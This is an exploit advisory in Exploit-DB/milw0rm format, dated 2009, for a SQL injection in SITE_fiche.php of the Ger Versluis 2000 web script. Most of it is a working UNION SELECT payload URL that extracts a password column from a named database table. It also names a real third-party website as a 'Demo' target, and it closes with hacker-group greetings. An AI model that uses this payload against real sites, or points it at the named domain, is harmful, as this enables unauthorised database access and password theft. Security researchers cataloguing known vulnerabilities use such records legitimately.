Ger Versluis 2000 5.5 24 - 'SITE_fiche.php' SQL Injection

EDB-ID:

9184

CVE:

N/A

Author:

DeCo017

Type:

webapps

Platform:

PHP

Published:

2009-07-17

 --------------------------------------------------------------------------
Ger Versluis 2000 version 5.5 24 SITE_fiche.php SQL Injection Vulnerability
--------------------------------------------------------------------------
 ###################################################
 [+] Author        :  DeCo017
 [+] Email         :  5s5[at]live[dot]fr
 [+] Vulnerability :  SQL injection
 ###################################################

Example:
http://www.site.com/path/SITE_fiche.php?id=-136++UNION SELECT 1,2,3,4,5,6,7,8,9,10,motdepasse,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95+from+IFI.CLASSCIMES_EVT_TMP/*
Demo :
http://www.ffme.fr/via-ferrata/SITE_fiche.php?id=136

Thanks for hack4love, rayo, saad, xweb, dbattack, x-sombrio, darkmaster and all 3asfh members

# milw0rm.com [2009-07-17]